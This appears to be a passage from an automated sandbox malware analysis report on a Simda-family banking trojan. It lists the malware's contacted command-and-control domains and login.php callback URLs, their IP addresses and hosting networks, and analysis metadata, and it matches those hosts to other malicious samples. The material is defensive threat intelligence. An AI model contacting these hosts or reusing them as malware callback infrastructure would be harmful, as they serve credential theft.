                                                                                                                                                                                                            http://lysyxux.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ganyfes.com/login.phpsvchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryvur.com/login.phpsvchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujygug.com/login.phpsvchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2847936839.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyxel.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzywag.com/svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volygyf.com/svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qebyteg.com/login.phpsvchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533383736.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811000740.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocydyc.com/login.phpsvchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyneh.com/login.phpsvchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyfen.com/login.phpsvchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qebykul.com/Hsvchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533385713.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532105233.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyxoj.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyxuj.com/login.phpsvchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            3.94.10.34
                                                                                                                                                                                                            		lymyxid.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            15.197.240.20
                                                                                                                                                                                                            		qexyhuv.comUnited States
                                                                                                                                                                                                            		7430TANDEMUStrue
                                                                                                                                                                                                            64.190.63.136
                                                                                                                                                                                                            		www.sedoparking.comUnited States
                                                                                                                                                                                                            		11696NBS11696UStrue
                                                                                                                                                                                                            72.52.179.174
                                                                                                                                                                                                            		pltraffic7.comUnited States
                                                                                                                                                                                                            		32244LIQUIDWEBUStrue
                                                                                                                                                                                                            103.224.212.108
                                                                                                                                                                                                            		lyxynyx.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                            154.85.183.50
                                                                                                                                                                                                            		qegyval.comSeychelles
                                                                                                                                                                                                            		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                                            47.103.150.18
                                                                                                                                                                                                            		unknownChina
                                                                                                                                                                                                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                            64.225.91.73
                                                                                                                                                                                                            		galynuh.comUnited States
                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                            208.91.196.145
                                                                                                                                                                                                            		9145.searchmagnified.comVirgin Islands (BRITISH)
                                                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                            52.34.198.229
                                                                                                                                                                                                            		lygyvuj.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            69.162.80.62
                                                                                                                                                                                                            		lysyfyj.comUnited States
                                                                                                                                                                                                            		46475LIMESTONENETWORKSUStrue
                                                                                                                                                                                                            23.253.46.64
                                                                                                                                                                                                            		gahyqah.comUnited States
                                                                                                                                                                                                            		19994RACKSPACEUStrue
                                                                                                                                                                                                            199.191.50.83
                                                                                                                                                                                                            		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                            13.248.169.48
                                                                                                                                                                                                            		pupydeq.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            18.208.156.248
                                                                                                                                                                                                            		pupycag.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            208.100.26.245
                                                                                                                                                                                                            		lyvyxor.comUnited States
                                                                                                                                                                                                            		32748STEADFASTUStrue
                                                                                                                                                                                                            103.224.182.252
                                                                                                                                                                                                            		vofycot.comAustralia
                                                                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                            199.59.243.226
                                                                                                                                                                                                            		77026.bodis.comUnited States
                                                                                                                                                                                                            		395082BODIS-NJUStrue
                                                                                                                                                                                                            103.150.11.230
                                                                                                                                                                                                            		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                            		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                            3.64.163.50
                                                                                                                                                                                                            		puzylyp.comUnited States
                                                                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                            		gadyciz.comUnited States
                                                                                                                                                                                                            		14618AMAZON-AESUStrue
                                                                                                                                                                                                            154.212.231.82
                                                                                                                                                                                                            		gadyniw.comSeychelles
                                                                                                                                                                                                            		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                            		lysyvan.comEuropean Union
                                                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                            178.162.203.226
                                                                                                                                                                                                            		gatyfus.comGermany
                                                                                                                                                                                                            		28753LEASEWEB-DE-FRA-10DEtrue

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                            Analysis ID:1507126
                                                                                                                                                                                                            Start date and time:2024-09-08 08:57:44 +02:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 9m 51s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:25
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:16
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:5AFlyarMds.exe
                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                            Original Sample Name:Virus.Hijack.ATA_virussign.com_fcf6de7351633752cf96e861d60b2a8c.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.bank.troj.spyw.expl.evad.winEXE@7/35@2027/24
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                                                                            • Number of executed functions: 79
                                                                                                                                                                                                            • Number of non-executed functions: 243
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.23.209.182, 2.23.209.179, 2.23.209.177, 2.23.209.158, 2.23.209.149, 2.23.209.150, 2.23.209.161, 2.23.209.176, 2.23.209.160, 2.23.209.183, 2.23.209.187, 2.23.209.130, 2.23.209.185, 2.23.209.189, 2.23.209.181, 20.42.73.29
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: 5AFlyarMds.exe

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            02:59:26API Interceptor24644x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                            02:59:39API Interceptor4x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            3.94.10.34uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                            • ypituyqsq.biz/yjhyaromqq
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • thoughprobable.net/index.php
                                                                                                                                                                                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • thoughprobable.net/index.php
                                                                                                                                                                                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • thoughprobable.net/index.php
                                                                                                                                                                                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • thoughprobable.net/index.php
                                                                                                                                                                                                            15.197.240.20uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • qexyhuv.com/login.php
                                                                                                                                                                                                            0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.marinamaquiagens.online/n4sv/
                                                                                                                                                                                                            8htbxM8GPX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • qexyhuv.com/login.php
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • qexyhuv.com/login.php
                                                                                                                                                                                                            rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                            QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.donnavariedades.com/fo8o/
                                                                                                                                                                                                            LF2024022.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                            • www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
                                                                                                                                                                                                            UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
                                                                                                                                                                                                            240330_unpackedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • pimphattana.com/
                                                                                                                                                                                                            64.190.63.136uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240908-0453-259e-befa-1cc84c51963f
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
                                                                                                                                                                                                            http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • sedoparking.com/frmpark/efense.com/Skenzor1/park.js
                                                                                                                                                                                                            http://leostop.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1
                                                                                                                                                                                                            4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                            • ww1.icodeps.com/?usid=27&utid=6773648594
                                                                                                                                                                                                            http://datingsitefree.pages.dev/link-2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.ngelits.com/search/tsc.php?200=NTY0Nzc0OTIz&21=OC40Ni4xMjMuMzM=&681=MTcyMTc3NTA4OTJjZTdkMmM1NjEwYTgyMzJjZDQwY2EzZjJmNzA0YTEy&crc=5d6b65933af518cdf4d15c16efb5151a23c299ab&cv=1
                                                                                                                                                                                                            zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.flu.cc/?usid=17&utid=
                                                                                                                                                                                                            Reporte Comercial.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ww1.pinochoconciertos.co/search/tsc.php?200=NTcxMTM0OTU2&21=OC40Ni4xMjMuMzM=&681=MTcxOTU5ODQ3MjU1NDYzYjVjOGQ4NGY5ZTRmYjFjZTRiNzhkZjBlODAy&crc=4cd4c0d65f78dddfc0f42871994ccdfc14d83923&cv=1
                                                                                                                                                                                                            pk3hXijbfHZz69Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.fullpaw.com/cr12/?jBZHx=KneTJ&t8o4ntI=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            77026.bodis.comuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            AxgZVzUv8m.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            https://emv1.jo333.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            https://www.jo333.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            https://emv1.lqhyhy.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            http://costpointfoundations.coGet hashmaliciousUnknownBrowse
